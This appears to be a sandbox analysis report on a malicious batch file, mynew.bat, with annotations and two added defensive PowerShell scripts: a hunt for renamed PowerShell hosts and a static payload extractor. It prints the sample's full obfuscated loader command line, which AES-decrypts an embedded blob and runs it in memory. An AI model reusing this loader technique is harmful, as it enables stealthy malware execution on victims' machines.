Analysis
max time kernel: 46s
max time network: 48s
platform: windows7_x64
resource: win7-20220812-en
resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
submitted: 04-01-2023 06:45
Static task: static1
Behavioral task: behavioral1
Sample: mynew.bat
Resource: win7-20220812-en
General
Target: mynew.bat
Size: 49KB
MD5: f010a779fc5fa3c0d6ef8d08cf2f82c3
SHA1: 37dec5efe2443e43a4290473b372a40bd9f494f9
SHA256: 7361111dc12ff526cb5391edfadb0a9ce69e75ba8d12b31122b224f9644290c0
SHA512: b76595be308c2e5c23e1f7e578573b1e108885d868a34ae10f18756de7f27f9be1beebc31b2e8275851bfa898f1a15b758ce3f903e7c888895a7779471670db8
SSDEEP: 768:m/7oBdu40Ozbblz1Osan4ha4j0YJDH7bzzE1k07LEHZMIXlOJFt0X495YrS8ra:aEBvHblRI4hJDHnk1dvEVwJL649O2
Malware Config
Signatures

Executes dropped EXE (1 IoC)
  pid 1560  mynew.bat.exe

Loads dropped DLL (1 IoC)
  pid 2020  cmd.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
  Caveat: this is the signature's generic description and the report attributes it to no process; on its own it is not evidence of file encryption.

Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 1560  mynew.bat.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  pid 1560  mynew.bat.exe  Token: SeDebugPrivilege
  SeDebugPrivilege lets a process open handles to processes belonging to other users, including SYSTEM; together with the process enumeration above it is the usual preparation for touching other processes.

Suspicious use of WriteProcessMemory (3 IoCs)
  pid 2020 cmd.exe wrote to the memory of pid 1560 mynew.bat.exe (three identical events)
  Caveat: a parent writing into a child it has just created is part of normal process start-up, so this entry records the cmd.exe -> mynew.bat.exe launch rather than injection into an unrelated process.
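The "Executes dropped EXE" entry is a PowerShell host copied under the batch file's name (the Processes section shows mynew.bat.exe accepting PowerShell's switches). One way to hunt for that pattern on a live host, as an added example that is not part of this report, the sample, or the sandbox: compare the OriginalFilename stored in each binary's PE version resource with its on-disk name, because a renamed copy keeps the resource of the original. The function name Find-RenamedPowerShell and the default search directories are the example's own choices; the OriginalFilename values 'PowerShell.EXE' (Windows PowerShell) and 'pwsh.dll' (PowerShell 7) are the ones those hosts ship with.

```powershell
# Hunt for PowerShell host binaries that run or sit on disk under another name,
# the pattern behind 'Executes dropped EXE' in this report (added example; not
# from the report, the sample, or the sandbox). A renamed copy keeps the PE
# version resource of the original, so OriginalFilename still says what it is.
function Find-RenamedPowerShell {
    param(
        # Directories swept on disk; this sample staged its copy in %TEMP%.
        # The defaults are the example's own choice.
        [string[]]$SearchRoot = @($env:TEMP, $env:PUBLIC, $env:ProgramData)
    )
    # OriginalFilename values the PowerShell hosts ship with:
    # Windows PowerShell -> 'PowerShell.EXE', PowerShell 7 (pwsh.exe) -> 'pwsh.dll'.
    $hostOriginal = @('PowerShell.EXE', 'pwsh.dll')
    # File names those hosts legitimately use on disk.
    $hostName = @('powershell.exe', 'pwsh.exe')

    # True when the file's version resource says PowerShell but its name does not.
    $isRenamed = {
        param([System.IO.FileInfo]$File)
        $orig = $File.VersionInfo.OriginalFilename
        if (-not $orig) { return $false }
        ($hostOriginal -contains $orig) -and ($hostName -notcontains $File.Name)
    }

    # Running processes: resolve each image path and test it.
    $fromProcesses = foreach ($p in Get-Process) {
        $path = $null
        try { $path = $p.Path } catch { }      # protected processes hide their path
        if (-not $path) { continue }
        $file = Get-Item -LiteralPath $path -ErrorAction SilentlyContinue
        if ($file -and (& $isRenamed $file)) {
            [PSCustomObject]@{
                Source = 'process'; PID = $p.Id; Path = $path
                OriginalFilename = $file.VersionInfo.OriginalFilename
            }
        }
    }

    # On-disk copies waiting to be launched, such as a staged <name>.bat.exe.
    $roots = $SearchRoot | Where-Object { $_ -and (Test-Path -LiteralPath $_) }
    $fromDisk = Get-ChildItem -Path $roots -Recurse -File -Include *.exe -ErrorAction SilentlyContinue |
        Where-Object { & $isRenamed $_ } |
        ForEach-Object {
            [PSCustomObject]@{
                Source = 'disk'; PID = $null; Path = $_.FullName
                OriginalFilename = $_.VersionInfo.OriginalFilename
            }
        }

    @($fromProcesses) + @($fromDisk)
}

# Usage: Find-RenamedPowerShell | Format-Table -AutoSize
# A hit whose Path ends in '.bat.exe' with OriginalFilename 'PowerShell.EXE' is
# the artefact this report records as mynew.bat.exe.
```

The same field is available in telemetry: Sysmon Event ID 1 carries OriginalFileName for every process start, so the equivalent rule is OriginalFileName equals PowerShell.EXE while Image does not end in \powershell.exe, which fires on the cmd.exe -> mynew.bat.exe launch in the process tree below without needing the dropped file's hash.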
Processes

1. C:\Windows\system32\cmd.exe (pid 2020)
   cmd /c "C:\Users\Admin\AppData\Local\Temp\mynew.bat"
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory

2. C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe (pid 1560, child of 1)
   "mynew.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $Hnouz = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mynew.bat').Split([Environment]::NewLine);foreach ($aOvdy in $Hnouz) { if ($aOvdy.StartsWith(':: ')) { $VFBbN = $aOvdy.Substring(3); break; }; };$APbgZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFBbN);$TxOqK = New-Object System.Security.Cryptography.AesManaged;$TxOqK.Mode = [System.Security.Cryptography.CipherMode]::CBC;$TxOqK.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$TxOqK.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=');$TxOqK.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QyA1AR4yRiYXGDMq0ZKCyQ==');$mOLfG = $TxOqK.CreateDecryptor();$APbgZ = $mOLfG.TransformFinalBlock($APbgZ, 0, $APbgZ.Length);$mOLfG.Dispose();$TxOqK.Dispose();$nIAlk = New-Object System.IO.MemoryStream(, $APbgZ);$GUMsr = New-Object System.IO.MemoryStream;$ourVj = New-Object System.IO.Compression.GZipStream($nIAlk, [IO.Compression.CompressionMode]::Decompress);$ourVj.CopyTo($GUMsr);$ourVj.Dispose();$nIAlk.Dispose();$GUMsr.Dispose();$APbgZ = $GUMsr.ToArray();$uPpYS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($APbgZ);$vzwYm = $uPpYS.EntryPoint;$vzwYm.Invoke($null, (, [string[]] ('')))
   - Executes dropped EXE
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken

Reading the second command line:
- mynew.bat.exe accepts -noprofile, -windowstyle hidden, -ep bypass and -command, which are PowerShell's switches, so the 462KB file listed under Downloads is a PowerShell host copied next to the batch file under the batch file's name. The batch stage that makes that copy is not shown in the report.
- Method names are stored reversed and rebuilt at run time: 'txeTllAdaeR'[-1..-11] -join '' is ReadAllText, 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, and 'daoL'[-1..-4] -join '' is Load. This only defeats naive string matching on the command line; the names are plain once the expression is evaluated.
- The payload is carried inside mynew.bat itself: the script reads its own file, takes the first line beginning with ':: ' (a batch comment, so cmd.exe ignores it) and Base64-decodes the rest of that line.
- The bytes are decrypted with AES in CBC mode with PKCS7 padding. The key (32 bytes, so AES-256) and the 16-byte IV are hard-coded in the command line, so the payload can be recovered statically without executing anything.
- The plaintext is gunzipped and handed to [System.Reflection.Assembly]::Load, and the assembly's EntryPoint is invoked with an empty string[] argument. The next stage therefore runs inside pid 1560 and never touches disk, which matches the Downloads section: only the PowerShell copy and memory dumps of pid 1560 were captured, and those dumps are where to look for the loaded assembly.
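The decode chain in that command line can be replayed without running the payload. The following PowerShell is an added example written for this report, not code from the sample, from mynew.bat, or from the sandbox: it reproduces the loader's carrier-line, Base64, AES-CBC and gzip stages with the reversed method names written out, but replaces Assembly.Load with a write to disk and a check for the MZ header. The function name Expand-BatLoaderPayload and the output path are the example's own; the key and IV defaults are the values hard-coded in the captured command line. Run it on an analysis VM against the sample file.

```powershell
# Static extractor for the loader in the captured command line (added example;
# not code from the sample, from mynew.bat, or from the sandbox).
# It replays stages 1-3 of the loader and stops before stage 4 (Assembly.Load),
# writing the decoded bytes to disk instead. Run on an analysis VM only.
function Expand-BatLoaderPayload {
    param(
        [Parameter(Mandatory)][string]$BatPath,   # the captured mynew.bat
        [Parameter(Mandatory)][string]$OutPath,   # where to write the decoded payload
        # Defaults are the Base64 key and IV hard-coded in the command line above.
        [string]$KeyB64 = 'OHLMkWak0mShc6SWbTBetVDMdS/ZPNqnInWDRzUQwCY=',
        [string]$IvB64  = 'QyA1AR4yRiYXGDMq0ZKCyQ=='
    )

    # Stage 1: the loader reads its own .bat and uses the first line that starts
    # with ':: ' (a batch comment, skipped by cmd.exe) as the carrier of the blob.
    $fullPath = (Resolve-Path -LiteralPath $BatPath).Path
    $carrier  = [System.IO.File]::ReadAllText($fullPath) -split "`r?`n" |
                Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
    if (-not $carrier) { throw "no ':: ' carrier line in $fullPath" }
    $cipher = [System.Convert]::FromBase64String($carrier.Substring(3))

    # Stage 2: AES-CBC with PKCS7 padding; a 32-byte key means AES-256.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = [System.Convert]::FromBase64String($KeyB64)
    $aes.IV      = [System.Convert]::FromBase64String($IvB64)
    $decryptor = $aes.CreateDecryptor()
    try     { $plain = $decryptor.TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $decryptor.Dispose(); $aes.Dispose() }

    # Stage 3: the plaintext is a gzip stream; inflate it to the raw payload.
    $inStream  = New-Object System.IO.MemoryStream(, $plain)
    $outStream = New-Object System.IO.MemoryStream
    $gzip = New-Object System.IO.Compression.GZipStream($inStream, [System.IO.Compression.CompressionMode]::Decompress)
    try     { $gzip.CopyTo($outStream); $payload = $outStream.ToArray() }
    finally { $gzip.Dispose(); $inStream.Dispose(); $outStream.Dispose() }

    # Stage 4 in the loader is Assembly.Load + EntryPoint.Invoke. Here the bytes go
    # to disk and are checked for the 'MZ' PE signature an assembly would carry.
    $outFull = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($OutPath)
    [System.IO.File]::WriteAllBytes($outFull, $payload)
    $sha256 = [System.Security.Cryptography.SHA256]::Create().ComputeHash($payload)
    [PSCustomObject]@{
        Output  = $outFull
        Bytes   = $payload.Length
        LooksPE = ($payload.Length -gt 2 -and $payload[0] -eq 0x4D -and $payload[1] -eq 0x5A)
        SHA256  = ([System.BitConverter]::ToString($sha256)).Replace('-', '')
    }
}

# Usage on the analysis VM:
#   Expand-BatLoaderPayload -BatPath C:\samples\mynew.bat -OutPath C:\samples\mynew.payload.bin
```

If LooksPE comes back false, the carrier line, key or IV differ from this sample (a rebuilt variant with the same loader would change all three), and TransformFinalBlock throwing a padding error is the usual symptom of a wrong key. The SHA256 of the written file is what to pivot on, since the hash in the Downloads section below belongs to the PowerShell copy, not to the payload.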
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\Local\Temp\mynew.bat.exe
  (also recorded under the drive-relative path \Users\Admin\AppData\Local\Temp\mynew.bat.exe; same file, same hashes)
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Memory dumps (pid 1560, mynew.bat.exe)
  memory/1560-55-0x0000000000000000-mapping.dmp
  memory/1560-57-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp    8KB
  memory/1560-58-0x000007FEF3F40000-0x000007FEF4963000-memory.dmp    10.1MB
  memory/1560-60-0x00000000026E4000-0x00000000026E7000-memory.dmp    12KB
  memory/1560-59-0x000007FEF33E0000-0x000007FEF3F3D000-memory.dmp    11.4MB
  memory/1560-61-0x00000000026E4000-0x00000000026E7000-memory.dmp    12KB
  memory/1560-62-0x00000000026EB000-0x000000000270A000-memory.dmp    124KB